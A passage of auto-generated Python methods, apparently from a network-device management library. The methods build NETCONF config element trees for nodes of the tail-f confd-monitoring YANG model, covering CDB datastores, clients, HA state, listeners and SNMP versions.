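# attribute on the built element rather than as an ElementTree namespace.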
def confd_state_internal_cdb_datastore_write_queue(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_queue = ET.SubElement(datastore, "write-queue")
write_queue.text = kwargs.pop('write_queue')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_filename(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
filename = ET.SubElement(datastore, "filename")
filename.text = kwargs.pop('filename')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_disk_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
disk_size = ET.SubElement(datastore, "disk-size")
disk_size.text = kwargs.pop('disk_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_ram_size(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
ram_size = ET.SubElement(datastore, "ram-size")
ram_size.text = kwargs.pop('ram_size')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_read_locks(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
read_locks = ET.SubElement(datastore, "read-locks")
read_locks.text = kwargs.pop('read_locks')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_write_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
write_lock_set = ET.SubElement(datastore, "write-lock-set")
write_lock_set.text = kwargs.pop('write_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_subscription_lock_set(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
subscription_lock_set = ET.SubElement(datastore, "subscription-lock-set")
subscription_lock_set.text = kwargs.pop('subscription_lock_set')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_waiting_for_replication_sync(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
waiting_for_replication_sync = ET.SubElement(datastore, "waiting-for-replication-sync")
waiting_for_replication_sync.text = kwargs.pop('waiting_for_replication_sync')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
priority = ET.SubElement(pending_subscription_sync, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
notification = ET.SubElement(pending_subscription_sync, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_subscription_sync_time_remaining(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_subscription_sync = ET.SubElement(datastore, "pending-subscription-sync")
time_remaining = ET.SubElement(pending_subscription_sync, "time-remaining")
time_remaining.text = kwargs.pop('time_remaining')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
priority = ET.SubElement(notification, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_datastore_pending_notification_queue_notification_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
datastore = ET.SubElement(cdb, "datastore")
name_key = ET.SubElement(datastore, "name")
name_key.text = kwargs.pop('name')
pending_notification_queue = ET.SubElement(datastore, "pending-notification-queue")
notification = ET.SubElement(pending_notification_queue, "notification")
client_name = ET.SubElement(notification, "client-name")
client_name.text = kwargs.pop('client_name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
name = ET.SubElement(client, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_info(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
info = ET.SubElement(client, "info")
info.text = kwargs.pop('info')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
type_leaf = ET.SubElement(client, "type")
type_leaf.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
datastore = ET.SubElement(client, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_lock(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
lock = ET.SubElement(client, "lock")
lock.text = kwargs.pop('lock')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
datastore = ET.SubElement(subscription, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_twophase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
twophase = ET.SubElement(subscription, "twophase")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
priority = ET.SubElement(subscription, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
id = ET.SubElement(subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
path = ET.SubElement(subscription, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
error = ET.SubElement(subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_version(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
version = ET.SubElement(confd_state, "version")
version.text = kwargs.pop('version')
callback = kwargs.pop('callback', self._callback)
return callback(config)
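# --- Usage sketch (illustrative comment, not part of the generated code) ---
# Each generated helper builds a <config> element tree for one node of the
# tail-f confd-monitoring YANG model, then hands it to a callback (by default
# self._callback, typically a NETCONF request handler). For example, assuming
# a device object `dev` that exposes these methods:
#
#     dev.confd_state_version(version='6.4')
#
# invokes the callback with an ElementTree that serializes to:
#
#     <config>
#       <confd-state xmlns="http://tail-f.com/yang/confd-monitoring">
#         <version>6.4</version>
#       </confd-state>
#     </config>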
def confd_state_smp_number_of_threads(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
smp = ET.SubElement(confd_state, "smp")
number_of_threads = ET.SubElement(smp, "number-of-threads")
number_of_threads.text = kwargs.pop('number_of_threads')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_epoll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
epoll = ET.SubElement(confd_state, "epoll")
epoll.text = kwargs.pop('epoll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_daemon_status(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
daemon_status = ET.SubElement(confd_state, "daemon-status")
daemon_status.text = kwargs.pop('daemon_status')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_read_only_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
read_only_mode = ET.SubElement(confd_state, "read-only-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_upgrade_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
upgrade_mode = ET.SubElement(confd_state, "upgrade-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
mode = ET.SubElement(ha, "mode")
mode.text = kwargs.pop('mode')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
node_id = ET.SubElement(ha, "node-id")
node_id.text = kwargs.pop('node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_master_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
master_node_id = ET.SubElement(ha, "master-node-id")
master_node_id.text = kwargs.pop('master_node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name = ET.SubElement(data_model, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_revision(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
revision = ET.SubElement(data_model, "revision")
revision.text = kwargs.pop('revision')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_namespace(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
namespace = ET.SubElement(data_model, "namespace")
namespace.text = kwargs.pop('namespace')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_prefix(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
prefix = ET.SubElement(data_model, "prefix")
prefix.text = kwargs.pop('prefix')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_exported_exported_to_all_exported_to_all(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
exported = ET.SubElement(data_model, "exported")
exported_to_all = ET.SubElement(exported, "exported-to-all")
exported_to_all = ET.SubElement(exported_to_all, "exported-to-all")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
ip = ET.SubElement(udp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
port = ET.SubElement(udp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v1(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v1 = ET.SubElement(version, "v1")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v2c(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v2c = ET.SubElement(version, "v2c")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v3(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v3 = ET.SubElement(version, "v3")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_engine_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
engine_id = ET.SubElement(snmp, "engine-id")
engine_id.text = kwargs.pop('engine_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id = ET.SubElement(callpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
daemon_id = ET.SubElement(daemon, "id")
# 'id' was already consumed above as the callpoint list key, so popping it
# again would raise KeyError; the daemon id arrives under a distinct keyword.
daemon_id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
